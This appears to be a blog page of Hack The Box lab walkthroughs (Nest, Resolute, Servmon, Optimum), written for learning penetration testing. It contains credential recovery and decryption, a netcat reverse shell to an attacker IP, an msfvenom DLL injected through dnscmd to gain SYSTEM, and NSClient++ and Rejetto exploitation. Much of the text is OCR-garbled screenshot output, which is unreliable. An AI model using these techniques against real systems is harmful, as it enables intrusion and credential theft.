Tag: walkthrough

Nest – No Metasploit

Definitely learned a new thing or two with this box. Anyway, let’s fire off nmap:

Okay… so let’s go look at port 4386 to try to see what it is.

HQK Reporting Service? Erm. Ok. Port 445 was open so let’s run smbclient to list the shares and smbmap to list the contents:

kaliö)hyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ cat smbclient.txt WARNING: The "syslog" option is deprecated Sharename ADMIN$ c$ Data IPC$ Secure$ Users Type Disk Disk Disk 1 pc Disk Disk Commen t Remote Admin Default share Remote IPC
ADMIN$ c$ Data dr--r--r 5 17 dr--r--r 7 15:07:51 7 15:07:51 7 15:07:51 7 15:07:33 7 15:07:33 7 15:07:33 7 15:07:32 •55:36 dr--r--r dr--r--r-- •56: 02 Wed Wed Wed Mon Mon Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Sat Sat Fri Sun Thu Thu Wed Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Jan Jan Aug Jan Aug Aug Aug 25 25 26 8 8 7 18. 7 18. 7 18. 02 . 13. 7 18. •53 •53. 13 : 29 • 02 . : 46 • 46 • 41 : 44 •56 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2020 2020 2019 2020 2019 2019 2019 NO ACCESS NO ACCESS READ ONLY IT Production Reports Shared Maintenance Templates Remote Admin Default share dr--r--r-- dr--r--r-- dr--r--r- dr--r--r-- . \Data dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- fr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- fr--r--r-- IPC$ Secure$ Users dr--r--r-- dr--r--r- dr--r--r- dr--r--r-- dr--r--r- 48 425 Maintenance Alerts. txt HR Marketing Welcome Email . txt NO ACCESS NO ACCESS READ ONLY Administrator C. Smi th L. Frost R. Thompson TempUser Remote IPC

What’s in Welcome Email.txt?

Cool. So we got a password. No… don’t go trying to use it just yet. Continue enumerating.

Looking at NotepadPlusPlus config.xml:

Looking at RU_config.xml:

… and that’s why we continue to enumerate FIRST.

Okay so, trying the creds that we’ve found so far… we figure out a couple things.

TempUser can get access with welcome2019

So can L.Frost!, but L.Frost can only login with welcome2019, not list shares for some reason (access denied)

Same with R.Thompson…

User: C.Smith and Password: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= can list contents in Secure$\IT\Carl\ directory with TempUser

kaliöhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ smbclient -U TempUser WARNING: The "syslog" option is deprecated Enter WORKGROUP\TempUser's password : Try "help" to get a list of possible commands. smb: recurse on smb: Is 7 15 : 40: 13 7 15 : 42: 14 7 15 : 42 7 15 7 15 7 15 7 15 : 44: 16 Finance HR IT \Finance NT STATUS NT STATUS NT STATUS ACCESS ACCESS ACCESS DENIED DENIED DENIED listing listing listing smb: cd smb: Is Docs Reports VB Projects \Docs ip.txt MC . txt \Reports 56 73 Wed Wed Wed Wed Thu Wed Wed Wed Tue Tue Wed Wed Wed Wed Tue Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug 8 6 6 6 09 10 7 15:43 09 06:59:25 : 45 : 41 : 45 : 40 : 55 : 42 : 40 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019

With the encrypted password, RUScanner had vb files (Module1.vb) with an example of how to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/wscanner$ cat Modulel.vb Module Modulel Sub Main() Dim Config As ConfigFiIe ConfigFi1e.LoadFromFiIe( "RU_Config.xm1") Dim test As New Ssolntegration With {.Username Config. Username, . Password End Sub End Module Utils . Decryptstring(config.password)}
'kaliöhyd3 : "Documents/htb/nest/smb/secure/wscanner$ cat Ssolntegration .vb Public Class Ssolntegration Public Property Username As String Public Property Password As String End Class
kaliö)hyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat ConfigFiIe.vb Public Class ConfigFi1e Public Property Port As Integer Public Property Username As String Public Property Password As String Public Sub SaveToFiIe(path As String) Using File As New 10. FileStream(Path, 10. FileMode.Create) Dim Writer As New XmI.SeriaIization Writer .Seria1ize(Fi1e, Me) End Using End Sub Public Shared Function LoadFromFi1e(ByVa1 FilePath As String) As ConfigFi1e Using File As New 10.FiIeStream(Fi1ePath, 10.FiIeMode.Open) Dim Reader As New Xml. Serialization Return DirectCast(Reader. Deseria1ize(Fi1e), ConfigFi1e) End Using End Function End Class

Utils.vb had the actual code to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat Utils . vb "N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256) Imports System. Text Imports System. Security .Cryptography Public Class Utils Public Shared Function GetLogFi1epath() As String Return 10. Path .Combine(Environment .CurrentDirectory , End Function "Log. txt") Public Shared Function Decryptstring(EncryptedString As String) As String If String.IsNu110rEmpty(EncryptedString) Then Return String. Empty Else Return Decrypt(EncryptedString, End If End Function Public Shared Function Encryptstring(PIainString As String) If String.IsNu110rEmpty(P1ainString) Then As String Return String. Empty Else Return Encrypt(PIainString, End If End Function Public Shared Function Encrypt(ByVa1 plainText As String, _ ByVa1 passPhrase As String, _ ByVaI saltVa1ue As String, _ ByVaI passwordlterations As BvVa1 initVector As String. "N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256) Integer, _

So I needed a nudge on this because this is all REALLY out of my brain capacity (but wouldn’t be for long!)… this involved A LOT of trial and error:

Cutting and pasting the code on .net Fiddle  (https://dotnetfiddle.net) and removing all the unnecessary (non encrypting related functions) and adding Imports System at the top (to get rid of the errors and import necessary classes/modules/etc to make the code work) and adding  Console.WriteLine(plainText) before the decrypt function returns gave us this code:

That last portion was used to just decrypt the actual string that we found earlier. This returned the password:

Sub Yarn ( ) 21m test As New Ssclntegratlcn Kith End sub End Class s xRxRx { . Username = "c. sm.1 th", . Password Utils . DecryptStr1ng ( Last Run: 10:00:46 pm

The password is: xRxRxPANCAK3SxRxRx

Using this, we can try to access the share with C.Smith’s username:

kalijhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ smbclient WARNING: The "syslog" option is deprecated Enter WORKGROUP\c . smith's password: Try "help" to get a list of possible commands. -U c.smith smb: recurse ON smb: dir Administrator C. Smi th L. Frost R. Thompson TempUser \Administrator NT_STATUS_ACCESS DENIED listing XC. Smi th HQK Reporting user. txt Sat Sat Fri Sun Thu Thu Wed Sun Sun Thu Thu Jan Jan Aug Jan Aug Aug Aug Jan Jan Aug Aug 25 25 26 8 8 02 . 7 18:55 13 : 03 : 01 13 : 50 : 56 26 26 8 8 02 02 . : 21 19:06:17 : 44 : 44 32 2020 2020 2019 2020 2019 2019 2019 2020 2020 2019 2019

We can then just download user.txt and read it:

smb : smb : type: smb : \ > cd C.Smith\ type user. txt command not found get user. txt /home/kaIi/Documents/htb/nest/user. txt getting file of size 32 as /home/ka1i/Documents/htb/nest/user.txt (0.2 KiloBytes/ sec) (average 0.2 KiloBytes/sec)

Now onto root. Looking around, we see some interesting files in HQK Reporting

smb: 7 19 : 41: 16 dir AD Integration Module Debug Mode Password . txt xmI Reporting\AD HqkLdap. exe A Module 249 Integration Thu Thu Fri Thu Thu Fri Fri Wed Aug Aug Aug Aug Aug Aug Aug Aug 8 8 8 8 9 9 08. 08. 9 08. 19:06:17 19:06:17 19:08:17 19 : 09 : 05 .18. .18. 42 • 42 A 17408 2019 2019 2019 2019 2019 2019 2019 2019

HQK_Config_Backup.xml contents:

Looking a bit at Debug Mode Password.txt, it looks interesting. After looking for hours, I remembered about using alternate data streams to hide stuff in files.

smb: alt-name: DEBUGM-I.TXT create time: access time: write time: change_time: Thu Aug 8 Thu Aug 8 Thu Aug 8 Thu Aug 8 allinfo PM PM PM PM bytes "Debug Mode Password . txt" 2019 EDT 2019 EDT 2019 EDT 2019 EDT -attributes: A (20) stream: [ : :$DATA], bytes stream: [ : Password : $DATA] , 15

Interesting… so there’s a stream called Password!

smb: Smith\HQK get "Debug Mode Password . txt" :Password /home/kaIi/Documents/htb/nest/ -c . smith/passwordhidden . txt getting file Smith\HQK Reporting\Debug Mode Password .txt:Password of size 15 as /home/ka1i/Docum ents/htb/nest/c. smith/passwordhidden. txt (0.1 KiloBytes/sec) (average 24.8 KiloBytes/sec)

Okay, so we know this is associated with the HQK service on port 4386. Let’s try to telnet with these creds:

Reading the manual for HQK Reporting Service, we can figure out the commands used to enumerate what is on the service.

>SETDIR . Current directory set to HQK >LIST Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR co man d QUERY FILES IN CURRENT DIRECTORY [DIR] [DIR] [DIR] [1] [2] [3] ALL QUERIES LDAP Logs HqkSvc . exe HqkSvc . InstallState HQK_Con fi g. xm1 Current Directory: HQK
Current >SETDIR Current >list Use the man d Directory: HQK LDAP directory set to LDAP query ID numbers below with the RUNQUERY command and the directory names with the SETDIR co QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap. exe [2] Ldap. conf Current Directory: LDAP
>SHOWQUERY 2 Domain-nest .10ca1 Port-389 BaseOu=OU=WBQ Users , DC-nest , DC-Iocal User-Administrator

To be continued…

Resolute – No Metasploit

Doing initial nmap recon, we get some lengthy output:

PORT 53/tcp 88/tcp 135/tcp 139/tcp 389/tcp 445/tcp 464/tcp 593/tcp 636/tcp 3268/tcp 3269/tcp 5985/tcp STATE open open open open open open open open open open open open SERVICE domain? kerberos-sec msrpc netbios-ssn Idap microsoft-ds kpasswd5? ncacn_http tcpwrapped Idap tcpwrapped http REASON syn syn syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 127 127 VERSION Microsoft Windows Kerberos (server time: 2020-05-19 20: øø: 38Z) Microsoft Windows RPC Microsoft Windows netbios-ssn Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) Microsoft Windows RPC over HTTP I.ø Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnp) .NET Message Framing Default-First-Site-Name) Default-First-Site-Name) l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 9389/tcp open mc-nmf 47ØØ1/tcp open http syn-ack tt1 127 syn-ack tt1 127 l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 49664/tcp 49665/tcp 49666/tcp 49667/tcp 49671/tcp 49676/tcp 49677/tcp 49688/tcp 49712/tcp 5519Ø/tcp open open open open open open open open open open msrpc msrpc msrpc msrpc msrpc ncacn_http msrpc msrpc msrpc unknown syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft HTTPAPI Windows Windows Windows Windows Windows Windows Windows Windows Windows httpd 2.0 (SSDP/UPnp) RPC RPC RPC RPC RPC RPC over HTTP 1.0 RPC RPC RPC Aggressive OS guesses: Microsoft 10 1507 (93%), Microsoft Windows 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows Windows Server 2016 build 10586 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%) 10 1507 - , Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ) .

So it looks like it’s a Windows box with quite a lot of ports open. My eye first caught Ports 139/445. So using enum4linux against resolute, we get some interesting information. I missed this the first time, but looking back over everything line-by-line, I was able to find some really juicy info:

Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) has has has has has has has has has has has has has has has has has has has has has has has has has has member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : MEGABANK\Administrator MEGABANK\DefauI tAccount MEGABANK\krbtgt MEGABANK\ryan MEGABANK\marko MEGABANK\sunita MEGABANK\abigai1 MEGABANK\marcus MEGABANK\sa1ty MEGABANK\fred MEGABANK\angeIa MEGABANK\feIicia MEGABANK\gustavo MEGABANK\u1f MEGABANK\stevie MEGABANK\c1aire MEGABANK\pau10 MEGABANK\steve MEGABANK\annette MEGABANK\annika MEGABANK\per MEGABANK\cmaude MEGABANK\me1anie MEGABANK\zach MEGABANK\simon MEGABANK\naoki
index: øx1øa9 RID: øx457 acb: øxøøøøø21ø Account: . Password set to Welcome123! marko Name: Marko Novak Desc : Account created

Okay so we see Marko Novak’s password is set to Welcome123! Trying this with evil-winrm to login, we get an authentication failure. However, let’s think this through. This looks like the default password created for new users. Running down the list, we try this with the user melanie

sudo evil-winrm -p Evil-WinRM shell v2.3 -i 10.10.10.169 -u melanie 'Welcome123! ' Info: Establishing connection to remote endpoint PS C: cd . PS C: dir -WinRb1*•

So from here, I actually used Powershell and uploaded nc.exe to get a more stable shell. Call me old-fashioned, but I just don’t like the Evil-WinRM shell.

PS C: Start-process 'C: .exe' umentList '-e cmd.exe 10.10.14.22 "3' -Arg
sudo nc -nvlp 443 listening on [any] 1+1+3 connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 53534 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Users

I don’t remember quite why, but I ended up using Evil-WinRM’s shell anyway. It’s good to have a backup.

Looking around, we find an unusual file under C:\ called “PSTranscripts”. We enumerated hidden files with dir -FORCE from the PowerShell prompt to find PSTranscripts.

ps C: type PowerShe11_transcript .RESOLUTE.OJuoBGhU.2ø1912ø3ø632ø1.txt Windows PowerSheII transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: I.ø, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtoc01Version: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063455 PS>TerminatingError(): "System error. " ComandInvocation(Invoke-Expression): "Invoke-Expression " ParameterBinding(Invoke-Expression): name= "Command" ; value- " if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value- "True" Command start time: 20191203063455 PS>ParameterBinding(Out-String): name* "InputObject" ; PS megabank\ryanöRESOLUTE Documents> ' ,$(whoami), ,$env:computername,' ' $pwd) .Name), ' ) - PS megabank\ryanöRESOLUTE Documents> value- "
Command start time: 20191203063515 " Invoke-Expression " ParameterBinding(Invoke-Expression): name- "Command" ; value-"cmd /c net use X: if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value-" - True" Windows PowerSheII transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding ryan Serv3r4Admin4cc123! Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: 1.0, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtocoIVersion: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063515 "Out-string" ParameterBinding(Out-String): ; cmd : The syntax of this command is: At line:l char:l value* "The syntax of this command is:" + cmd /c net use X: ryan Serv3r4Admin4cc123! + Categorylnfo NotSpecified: (The syntax of this command is: :string) [ ] , + FullyQua1ifiedErrorId NativeComandError cmd : The syntax of this command is: At line:l char:l + cmd /c net use X: ryan Serv3r4Admin4cc123! RemoteException RemoteException + Categorylnfo + FullyQua1ifiedErrorId Windows PowerShe11 transcript start time: 20191203063515 NotSpecified: (The syntax of this command is: :string) [ ] , NativeComandError start

Did you see it? ryan’s password is in the other transcript file! Password: Serv3r4Admin4cc123!

Let’s try these creds with ryan:

Alright, time to look around. We enumerated around, looking at basic stuff like whoami /groups

GROUP INFORMATION Group Name Everyone BUILTIN\Users BUILTIN\Pre-Windows 2øøø Compatible PS C: whoami /groups s-l-l-ø 32—545 —32—554 s-1-5-32-580 s-1 s-1-5-11 s-1-5-15 s 5-64-10 Access BUILTIN\Remote Management Users NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization MEGABANK\Contractors MEGABANK\DnsAdmins NT AUTHORITY\NTLM Authentication Mandatory Label\Medium Mandatory Type Well-known Alias Alias Alias Well-known Well-known Well-known Group Alias Well-known Label group group group group group SID s-1-5- s-1-5 s-1-5-21-1392959593-3013219662-3596683436-1103 s-1-5-21-1392959593-3013219662-3596683436-1101 s-1-16-8192 Attributes Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory group , group , group , group , group , group , group , group , group , group , Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled by by by by by by by by by by default, default, default, default, default, default, default, default, default, default, Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled group group group group group group group group group, Local Group group Level

After a while, I came up with nothing. I used PowerUp.ps1 to find an interesting potential exploit:

HijackabIePath : C: AbuseFunction . Write-HijackDII -OutputFiIe 'C: . dll' -Command

This link actually helped me out a lot in understanding what to do next.

So, I created a malicious DLL:

kaliö)hyd3 . —"Documents/htb/resolute$ msfvenom -p L HOST=1ø.1ø.14.22 LPORT=443 -a -f -o wibsctrl.dll [-] No platform was selected, choosing Msf: :Modu1e: :P1atform: :Windows from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dil file: 5120 bytes Saved as: wlbsctrl .dII

Then I served it up on SMB:

kaliö)hyd3: "Documents/htb/resolute$ sudo python3 /usr/share/doc/python3-impacket/exampIes/smbserver .py ROPNOP /home/kaIi/Documents/htb/resoIute/ Impacket vø.9 .21 - Copyright 2020 SecureAuth Corporation

And I injected the DLL remotely (really cool new trick I didn’t know before):

PS C: dnscmd .exe RESOLUTE /config /serverlevelplugindll Registry property server1eve1p1ugind11 successfully reset . Command completed successfully. PS C: sc . exe stop dns SERVICE NAME: dns TYPE STATE WIN32 EXIT CODE SERVICE EXIT CODE CHECKPOINT WAIT HINT 10 WIN32 OWN PROCESS 3 STOP PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) (øxø) (øxø) øxø øxø PS C: sc . exe start dns

I then started the DNS process as seen above. With the listener on port 443, I caught an NT AUTHORITY\SYSTEM shell:

listening on [any] 1+1+3 . connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 52809 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Windows whoami nt authority\system C: C: . txt type C: . txt The system cannot find the file specified. cd C: C: Desktop\root . txt type Desktop\root . txt eld94876a5ø685ødøc2øedb5W5e619c

Servmon – No Metasploit

So I fired off AutoRecon (written by Tib3rius) and after it was done, this is what nmap found:

135/tcp 139/tcp 445/tcp 5Ø4Ø/tcp 5666/tcp 6Ø63/tcp 6699/tcp 8443/tcp open open open open open open open open msrpc netbios-ssn microsoft-ds? unknown tcpwrapped tcpwrapped napster? ssl/https-alt syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack 127 Microsoft Windows RPC 127 Microsoft Windows netbios-ssn 127 127 127 127 127 127 fingerprint-strings : FourOhFourRequest, HTTPOptions, RTSPRequest , HTTP/I.1 Content-Length: 18 Document not found GetRequest : HTTP/I.1 302 Content-Length: Location: / index. html i day : Saturday workers jobs submitted errors threads OfficeScan : HTTP/I.1 302 Content-Length: Location: / index. html workers j obs submitted errors threads metasploi t-msgrpc : HTTP/I.1 403 Content-Length: 20 Your not allowed http-methods: Supported Methods: GET httD-tit1e: NSC1ient++ SIPOptions, apple-iphoto, docker , hazelcast-http:

Alright, well let’s start with ftp. After getting anonymous access to ftp, I found this:

125 Data 01-18-20 01-18-20 connection 12 : 06PM 12 : 08PM already open; Transfer starting. Nadine Nathan
01-18-20 12: 08PM 226 Transfer complete. ftp> cd Nathan 250 CWD command successful. ftp> dir 200 PORT command successful. Nathan 125 Data connection already open; Transfer starting. 01-18-20 12: IOPM 226 Transfer complete. ftp> get local: to local: to: 186 Notes to do. txt ' Notes to do. txt' txt ' Notes remote: Permission denied
Nathan , I left your Passwords . txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine

So that’s a hint that Passwords.txt is a file under Nathan’s username. Using basic knowledge of Windows file system mapping, we can guess at where exactly this file is. Something like C:\Users\Nathan\Desktop\Passwords.txt maybe?

Enumerating further, we find that Port 80 runs something called NVMS. Let’s look on Searchsploit for nvms:

kaliöhyd3 . —"Downloads$ searchsploit nvms Exploit Title NVMS løøø - Directory Traversal Path (/usr/share/exploi tdb/) exploi ts/hardware/webapps/47774. txt

Before we go to trying to exploit this… let’s continue properly enumerating. Port 8443 has something called NSClient++ running on it.

kaliöhyd3 . —"Documents/htb/servmon$ searchsploit NSC1ient Exploit Title NSC1ient++ 0.5.2.35 - Privilege Escalation Path (/usr/share/exploi tdb/) expl oi ts/windows/l oca1/46802. txt

Okay so we have a priv esc possibility in our back pocket.

Firing off burp, we use the directory traversal to see if anything good comes of that guess on Passwords.txt’s location

Sweet. Now doing a bit of research, we can also find the location of the file that contains the password for NSClient++. It’s in a file called nsclient.ini. Reading this file, we get another password

However, it looks like we can only log into this from the “allowed host” of 127.0.0.1.

Trying to use the list of passwords found in Passwords.txt with nadine and SSH, we eventually get in with username: nadine and password: L1k3B1gBut7s@W0rk

Now that we’re in, let’s focus on our initial hunch of using NSClient++ to priv esc. First, we use plink.exe to set up a port forward via SSH

Now this took a bit of messing around with, but eventually what I did was uploaded nc.exe into temp and created a bat file to return a reverse shell.

The WebUI was pretty difficult to understand how to work so I ended up reading documentation and using the API to put the script rev.bat onto the box

To trigger the script, I then booted up the WebUI and ran scripts\ex\rev.bat in the console

On our listener, we get an NT AUTHORITY\SYSTEM shell

HTB – Optimum Box Walkthrough [No Metasploit]

This is an awesome box… pretty straight forward up to user, but but definitely got caught up in a few things that I’ll be sure to never do again… and getting root was not so easy… you definitely learn a lot with this box… wget scripting for windows… windows priv esc tools… anyway let’s get started.

First, let’s get an Nmap scan done:

Ok so only port 80 is open… a little more enumeration will show that the website is running on Rejetto…

I typically only like to use exploit-db’s stuff (searchsploit runs off exploit-db in case you didn’t know)

An exploit search yields:

The code shows the usage:

So after you download the file, copy it into a new folder… edit the script accordingly…

The directions also say you need to copy nc.exe from your system… make sure you copy the right one (not the sql one)

Then serve it all up on a web server

Run the script…

Then look at your nc -nvlp window…. You’re in kostas. Get your user flag.

Priv Esc to Root

Ok… full disclosure, this took me QUITE a while to figure out, but I was determined to not use Metasploit

After looking at systeminfo, googling windows privilege escalation tools, etc., I came across https://resources.infosecinstitute.com/windows-exploit-suggester-an-easy-way-to-find-and-exploit-windows-vulnerabilities/

After I saw it was vulnerable to MS16-098 and looking around the web… a lot… I came across this little bad boy:

And this is where I pulled a super noob move and wasted hours. First, I downloaded the file directly and tried to compile it… guess what… you can’t directly compile a C file in a Linux environment.

I then tried downloading the binary directly through my browser… which constantly resulted in a 0 byte file… very frustrated I went to go get a beer and take a break.

I came back, used plain old git in terminal… and voila!

Move the file to the folder where you’re serving up SimpleHTTP on!

So now I’m wondering… how am I gonna get this .exe onto the victim machine? wget won’t work because we’re in a windows environment…

Make wget script for windows (I had to google how to do this)

Use the wget script you made earlier to move the .exe onto the victim machine…

Moment of truth… this .exe better work… lol

Run it…. And BOOM! You should get root.

Hackthebox.eu VIP… Worth it?

Yeah… it kinda is

For those of you who are newer and are using Hackthebox.eu as a learning platform… let me let you in on a little secret… it’s okay to use walkthroughs sometimes. Guess what? You can only get the walkthroughs for hackthebox’s machines for retired machines… which you only have access to on VIP. It’s only 10 Euros a month and you can cancel whenever. That’s less than 2 Starbucks coffees for a ton more value in terms of learning.

Ignore those people who say you should never use a walkthrough because it’s showing that you’re giving up… I’m somewhat new to pentesting and guess what… I am a fast learner and I like to learn things quickly. Don’t get me wrong, I’ll spend (sometimes) hours on a box before I resort to a walkthrough if I need it… but guess what… once I finally resort to it I will NEVER forget what I did wrong or what I missed.

After all… you’re learning to exploit machines… and this stuff isn’t easy… otherwise everyone would be doing it. On here you’ll find some HTB walkthroughs because I think it’s just good for the community for me to share my findings… that’s how we all get better.